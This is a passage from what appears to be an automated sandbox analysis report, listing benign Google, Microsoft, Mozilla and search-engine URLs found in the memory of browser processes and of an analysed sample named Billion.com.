                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icoue
                Source: chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chrome.exe, 00000012.00000002.2812447524.0000278000BA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                Source: chrome.exe, 00000012.00000002.2812447524.0000278000BA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                Source: chrome.exe, 00000012.00000002.2812447524.0000278000BA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000012.00000003.2722102002.00002780004C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2882165201.000026600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.3000415537.000074F40238C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: manifest.json0.27.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: chrome.exe, 00000012.00000002.2810742039.00002780006C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 00000012.00000002.2817463999.00002780010D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812036983.0000278000A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811010314.0000278000740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 00000012.00000002.2812036983.0000278000A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en3
                Source: chrome.exe, 00000012.00000003.2738845827.0000278000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2813166467.0000278000CE7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2748604396.0000278000CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2734096350.0000278000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2734179595.0000278000CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735589307.0000278000CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000012.00000003.2769525973.00002780014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769597201.00002780014FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717797344.0000004400684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: chrome.exe, 00000012.00000002.2808273997.0000278000014000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2882165201.000026600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.3000415537.000074F40238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.27.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 00000012.00000002.2812984073.0000278000C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                Source: chrome.exe, 00000012.00000003.2713642249.00002CCC002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2713624499.00002CCC002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810913405.0000278000708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810771573.00002780006D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2808334809.0000278000044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722102002.00002780004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2881594802.0000266000040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2997998932.000074F402220000.00000004.00000800.00020000.00000000.sdmp, manifest.json.27.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000012.00000002.2810554189.0000278000650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000006194000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.12.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000006194000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.12.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 00000012.00000002.2819102129.0000278001344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: 2cc80dabc69f58b6_0.27.dr, Reporting and NEL.28.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.
                Source: manifest.json.27.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000012.00000003.2769737177.000027800153C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2769702296.0000278001534000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809890970.0000278000488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812984073.0000278000C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812984073.0000278000C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809890970.0000278000488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2809890970.0000278000488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2816785979.0000278000FEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                Source: manifest.json.27.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.c
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                Source: chrome.exe, 00000012.00000002.2809431183.0000278000374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googlP7
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json.27.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: manifest.json.27.drString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 00000012.00000002.2809376618.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735151718.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2732621548.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2736735650.0000278000358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chrome.exe, 00000012.00000002.2812775099.0000278000C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/chrome_newtabi
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.dr, HubApps Icons.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.dr, HubApps Icons.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp.27.dr, HubApps Icons.27.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: chrome.exe, 00000012.00000003.2769573535.00002780014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2796338915.000000440078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000012.00000003.2717396874.000000440039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2717142426.0000004400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
